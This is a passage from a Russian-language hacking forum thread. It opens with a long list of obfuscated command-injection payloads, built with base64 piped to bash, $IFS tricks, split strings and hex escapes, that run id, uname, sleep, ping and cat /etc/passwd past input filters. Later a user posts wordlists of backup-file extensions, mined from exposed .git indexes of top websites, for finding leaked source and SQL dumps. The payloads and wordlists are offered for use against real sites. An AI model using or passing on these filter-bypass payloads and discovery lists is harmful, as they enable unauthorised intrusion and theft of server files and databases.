    /b$!in/ca$!t</et$!c/pa$!s$!s$!w$!d
    `echo "L3Vzci9iaW4vaWQ="|base64 -d`
    $(echo "L3Vzci9iaW4vaWQ="|base64 -d)
    echo "L3Vzci9iaW4vaWQ="|base64 -d|bash
    `echo "L2Jpbi91bmFtZQ=="|base64 -d`
    $(echo "L2Jpbi91bmFtZQ=="|base64 -d)
    echo "L2Jpbi91bmFtZQ=="|base64 -d|bash
    `echo "dW5hbWU="|base64 -d`
    $(echo "dW5hbWU="|base64 -d)
    echo "dW5hbWU="|base64 -d|bash
    `echo "c2xlZXAgMTAw"|base64 -d`
    $(echo "c2xlZXAgMTAw"|base64 -d)
    echo "c2xlZXAgMTAw"|base64 -d|bash
    `echo "L2Jpbi9zbGVlcCAxMDA="|base64 -d`
    $(echo "L2Jpbi9zbGVlcCAxMDA="|base64 -d)
    echo "L2Jpbi9zbGVlcCAxMDA="|base64 -d|bash
    `echo$IFS"L3Vzci9iaW4vaWQ="|base64$IFS-d`
    $(echo$IFS"L3Vzci9iaW4vaWQ="|base64$IFS-d)
    echo$IFS"L3Vzci9iaW4vaWQ="|base64$IFS-d|bash
    `echo$IFS"L2Jpbi91bmFtZQ=="|base64$IFS-d`
    $(echo$IFS"L2Jpbi91bmFtZQ=="|base64$IFS-d)
    echo$IFS"L2Jpbi91bmFtZQ=="|base64$IFS-d|bash
    `echo$IFS"dW5hbWU="|base64$IFS-d`
    $(echo$IFS"dW5hbWU="|base64$IFS-d)
    echo$IFS"dW5hbWU="|base64$IFS-d|bash
    `echo$IFS"c2xlZXAgMTAw"|base64$IFS-d`
    $(echo$IFS"c2xlZXAgMTAw"|base64$IFS-d)
    echo$IFS"c2xlZXAgMTAw"|base64$IFS-d|bash
    `echo$IFS"L2Jpbi9zbGVlcCAxMDA="|base64$IFS-d`
    $(echo$IFS"L2Jpbi9zbGVlcCAxMDA="|base64$IFS-d)
    echo$IFS"L2Jpbi9zbGVlcCAxMDA="|base64$IFS-d|bash
    `echo${IFS}"L3Vzci9iaW4vaWQ="|base64${IFS}-d`
    $(echo${IFS}"L3Vzci9iaW4vaWQ="|base64${IFS}-d)
    echo${IFS}"L3Vzci9iaW4vaWQ="|base64${IFS}-d|bash
    `echo${IFS}"L2Jpbi91bmFtZQ=="|base64${IFS}-d`
    $(echo${IFS}"L2Jpbi91bmFtZQ=="|base64${IFS}-d)
    echo${IFS}"L2Jpbi91bmFtZQ=="|base64${IFS}-d|bash
    `echo${IFS}"dW5hbWU="|base64${IFS}-d`
    $(echo${IFS}"dW5hbWU="|base64${IFS}-d)
    echo${IFS}"dW5hbWU="|base64${IFS}-d|bash
    `echo${IFS}"c2xlZXAgMTAw"|base64${IFS}-d`
    $(echo${IFS}"c2xlZXAgMTAw"|base64${IFS}-d)
    echo${IFS}"c2xlZXAgMTAw"|base64${IFS}-d|bash
    `echo${IFS}"L2Jpbi9zbGVlcCAxMDA="|base64${IFS}-d`
    $(echo${IFS}"L2Jpbi9zbGVlcCAxMDA="|base64${IFS}-d)
    echo${IFS}"L2Jpbi9zbGVlcCAxMDA="|base64${IFS}-d|bash
    /u`ddd`sr/b`ddd`in/i`ddd`d
    /bi`ddd`n/un`ddd`ame
    una`ddd`me
    sle`ddd`ep 100
    pi`ddd`ng your_ip
    /bi`ddd`n/sl`ddd`eep 100
    /b`ddd`in/p`ddd`ing your_ip
    sle`ddd`ep$IFS\100
    pi`ddd`ng$IFS\your_ip
    /bi`ddd`n/sl`ddd`eep$IFS\100
    /b`ddd`in/p`ddd`ing$IFS\your_ip
    sle`ddd`ep${IFS}100
    pi`ddd`ng${IFS}your_ip
    /bi`ddd`n/sl`ddd`eep${IFS}100
    /b`ddd`in/p`ddd`ing${IFS}your_ip
    c`ddd`at<>/e`ddd`tc/pa`ddd`ss`ddd`wd
    c`ddd`at</e`ddd`tc/pa`ddd`ss`ddd`wd
    /u$(ddd)sr/b$(ddd)in/i$(ddd)d
    /bi$(ddd)n/un$(ddd)ame
    una$(ddd)me
    sle$(ddd)ep${IFS}100
    sle$(ddd)ep$IFS\100
    sle$(ddd)ep 100
    pi$(ddd)ng${IFS}your_ip
    pi$(ddd)ng$IFS\your_ip
    pi$(ddd)ng your_ip
    /bi$(ddd)n/sl$(ddd)eep${IFS}100
    /bi$(ddd)n/sl$(ddd)eep$IFS\100
    /bi$(ddd)n/sl$(ddd)eep 100
    /b$(ddd)in/p$(ddd)ing${IFS}your_ip
    /b$(ddd)in/p$(ddd)ing$IFS\your_ip
    /b$(ddd)in/p$(ddd)ing your_ip
    c$(ddd)at<>/e$(ddd)tc/pa$(ddd)ss$(ddd)wd
    c$(ddd)at</e$ddd)tc/pa$(ddd)ss$(ddd)wd
    /us[sr]/bi[vcn]/i[ad]
    /bi[vcn]/u[ln]am[sde]
    /bi[vbn]/sl[sfe]e[erp] 100
    /bi[vbn]/p[ei]n[sg] your_ip
    /bi[vbn]/sl[sfe]e[erp]$IFS\100
    /bi[vbn]/p[ei]n[sg]${IFS}your_ip
    /bi[vbn]/sl[sfe]e[erp]${IFS}100
    /bi[vbn]/p[ei]n[sg]$IFS\your_ip
    ${ddd-/us}r${ddd-/bi}n${ddd-/i}d
    ${ddd-/bi}n${ddd-/un}a${ddd-m}e
    ${asd-u}n${asd-a}m${asd-e}
    ${ddd-sl}e${ddd-e}p 100
    ${ddd-p}i${ddd-n}g your_ip
    ${ddd-/bi}n${ddd-/s}l${ddd-e}e${ddd-p} 100
    ${ddd-/bi}n${ddd-/p}i${ddd-n}g your_ip
    ${ddd-sl}e${ddd-e}p$IFS\100
    ${ddd-p}i${ddd-n}g$IFS\your_ip
    ${ddd-/bi}n${ddd-/s}l${ddd-e}e${ddd-p}$IFS\100
    ${ddd-/bi}n${ddd-/p}i${ddd-n}g$IFS\your_ip
    ${ddd-sl}e${ddd-e}p${IFS}100
    ${ddd-p}i${ddd-n}g${IFS}your_ip
    ${ddd-/bi}n${ddd-/s}l${ddd-e}e${ddd-p}${IFS}100
    ${ddd-/bi}n${ddd-/p}i${ddd-n}g${IFS}your_ip
    a=/us;b=r;c=/b;d=in;f=/i;g=d;$a$b$c$d$f$g
    a=/bi;b=n;c=/u;d=n;f=a;g=me;$a$b$c$d$f$g
    c=u;d=n;f=a;g=me;$c$d$f$g
    c=s;d=le;f=e;g=p;$c$d$f$g 100
    a=p;b=i;c=n;d=g;$a$b$c$d your_ip
    a=/bi;b=n;c=/s;d=l;f=ee;g=p;$a$b$c$d$f$g  100
    a=/bi;b=n;c=/p;d=i;f=n;g=g;$a$b$c$d$f$g your_ip
    c=s;d=le;f=e;g=p;$c$d$f$g$IFS\100
    a=p;b=i;c=n;d=g;$a$b$c$d$IFS\your_ip
    a=/bi;b=n;c=/s;d=l;f=ee;g=p;$a$b$c$d$f$g$IFS\100
    a=/bi;b=n;c=/p;d=i;f=n;g=g;$a$b$c$d$f$g$IFS\your_ip
    c=s;d=le;f=e;g=p;$c$d$f$g${IFS}100
    a=p;b=i;c=n;d=g;$a$b$c$d${IFS}your_ip
    a=/bi;b=n;c=/s;d=l;f=ee;g=p;$a$b$c$d$f$g${IFS}100
    a=/bi;b=n;c=/p;d=i;f=n;g=g;$a$b$c$d$f$g${IFS}your_ip
    a=/us&&b=r&&c=/b&&d=in&&f=/i&&g=d;$a$b$c$d$f$g
    a=/bi&&b=n&&c=/u&&d=n&&f=a&&g=me&&$a$b$c$d$f$g
    c=u&&d=n&&f=a&&g=me&&$c$d$f$g
    c=s&&d=le&&f=e&&g=p&&$c$d$f$g 100
    a=p&&b=i&&c=n&&d=g&&$a$b$c$d your_ip
    a=/bi&&b=n&&c=/s&&d=l&&f=ee&&g=p&&$a$b$c$d$f$g  100
    a=/bi&&b=n&&c=/p&&d=i&&f=n&&g=g&&$a$b$c$d$f$g your_ip
    c=s&&d=le&&f=e&&g=p&&$c$d$f$g$IFS\100
    a=p&&b=i&&c=n&&d=g&&$a$b$c$d$IFS\your_ip
    a=/bi&&b=n&&c=/s&&d=l&&f=ee&&g=p&&$a$b$c$d$f$g$IFS\100
    a=/bi&&b=n&&c=/p&&d=i&&f=n&&g=g&&$a$b$c$d$f$g$IFS\your_ip
    c=s&&d=le&&f=e&&g=p&&$c$d$f$g${IFS}100
    a=p&&b=i&&c=n&&d=g&&$a$b$c$d${IFS}your_ip
    a=/bi&&b=n&&c=/s&&d=l&&f=ee&&g=p&&$a$b$c$d$f$g${IFS}100
    a=/bi&&b=n&&c=/p&&d=i&&f=n&&g=g&&$a$b$c$d$f$g${IFS}your_ip
    \x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x69\x64
    \x2F\x62\x69\x6E\x2F\x75\x6E\x61\x6D\x65
    \x75\x6E\x61\x6D\x65
    \x73\x6C\x65\x65\x70\x20\x31\x30\x30
    \x70\x69\x6E\x67\x20your_ip
    \x2F\x62\x69\x6E\x2F\x73\x6C\x65\x65\x70\x20\x31\x30\x30
    \x2F\x62\x69\x6E\x2F\x70\x69\x6E\x67\x20x20your_ip
    
     
    CyberTro1n, b3, failsafe and 3 others like this.
  7. git

    git New Member

    Joined:
    25 Feb 2021
    Messages:
    3
    Likes Received:
    4
    Reputations:
    2
    Предлогаю расширить базу через сбор данных из /git/.index топ миллиона сайтов с alexa. Слил все в локальную базу, пример для Backup files exstensions по запросам:

    PHP.*

    Code:
    .tpl
    .swo
    .bak_adminrename
    .original
    .svn-base
    .backup
    .bak
    .swp
    .desenv
    .homolog
    .prod
    .server
    .save
    .save.1
    .save.2
    .bak2
    .generic
    .dist
    .orig
    .save4
    .sample
    .txt
    .tokens
    .xml
    .rename
    .orginal
    .back
    .back.
    .old
    .code
    .1-11-2020
    .cache
    .meta
    .in
    .LCK
    .bkp
    .kate-swp
    .suspected
    .Old
    .css
    .template
    .net
    .default
    .example
    .new
    .0402.new
    .0402.original
    .0406
    .current.
    .jpg
    .tl.20161213
    .160407.sam
    .tl.20161206
    .tl.20160411
    .tl.20160524
    .tl.20161227
    .tl.20160303
    .del
    .gz
    .help
    .json
    .disabled
    .min.js
    .def
    .swn
    .un~
    
    .170524
    .181124
    .org
    .20-10-20
    .21-10-20
    .html
    .epl.prefs
    .prefs
    .add
    .core.prefs
    .jquery
    .docker
    .12.08.2016
    .beforecouponnew
    
    .old.
    .1.old
    .old.12
    .
    .bac.
    .bac
    
    .advanced
    .srm.bak
    
    .bk
    .bak1
    .original"
    .templ
    
    .allsend.bak
    .bu
    .SAMPLE
    .bck
    
    .vold
    .sh
    .zip
    .twig
    .default.
    .BASE
    .BASE.moved
    .OTHER.moved
    .OTHER
    .THIS
    .rej
    .min.css
    .quebrado
    .initial
    .2012_02_13_header_from_stories
    .xsl
    .back1.0.6
    .back2.0.3
    .back1.4.2
    .back1.4.4
    .back1.4.5
    .back1.4.3
    .back1.0.0"
    .20160314
    .20160324
    .backup20141104
    .20160129
    .20160317
    
    PHP~*

    Code:
    ~
    ~Stashed changes
    ~old
    ~original
    ~"
    ~RF124a4ee.TMP
    ~RF1248b9a.TMP
    ~RF12a48c7.TMP
    ~RF129b37c.TMP
    ~RF12878d9.TMP
    ~RF12595d6.TMP
    ~RF1255b7c.TMP
    ~RF12469c9.TMP
    ~RF1243665.TMP
    ~RF122995f.TMP
    ~RF123f267.TMP
    ~RF1226658.TMP
    ~RF11f4e99.TMP
    
    PHP_*

    Code:
    _
    ~
    _backup
    _backupold
    _cs
    _bc
    -peter
    __bc
    -backup-15-04-2020
    _GD_OLD
    _bak
    t
    _cs.dist
    _old
    __
    _22_04_2020
    ___
    _2_Oct_2019
    _"
    _example
    _bkp
    _20160310_sam_bak
    _ihuyi
    info.
    _v1
    _20100807_221324.svn-base
    _20100807_221324
    _eredeti
    _cs.cache
    -11-07-2015
    _2010_02_03
    _bck
    .20-10-20
    .21-10-20
    _x
    .html
    _jos
    _thisip
    _org
    _20190502
    _20181213
    _20190219
    _20190404
    _20190523
    _original
    _20190613
    _oud
    _20190228
    _aangepast
    _reserve
    _origineel
    _20190425
    _20193101
    -older
    __TEMPLATE__
    _before_coupon
    _bu
    _bk
    -fio
    __ahihi
    _OLD2
    -base
    -ours
    -theirs
    _pre_seth
    _ns
    _t
    _variables.html.twig
    _ambackup
    _to_Delete
    -
    _with_conversion
    ____
    
    

    Принимаю идеи для поиска.
     
    #9 git, 25 Feb 2021
    Last edited: 25 Feb 2021
    CyberTro1n and b3 like this.
  8. git

    git New Member

    Joined:
    25 Feb 2021
    Messages:
    3
    Likes Received:
    4
    Reputations:
    2
    Хотите знать пути до дампов и собрать маски для поиска sql фаилов?
    SQL
     

    Attached Files:

    • sql.txt
      File size:
      230.4 KB
      Views:
      443
    b3 likes this.
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    могу поспорить я знаю кто ты) и ты заеаааа уже новые аки делать) но за информативный пост спасибо)
    А так же всем спасибо кто делает свой вклад.
     
    Baskin-Robbins likes this.
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8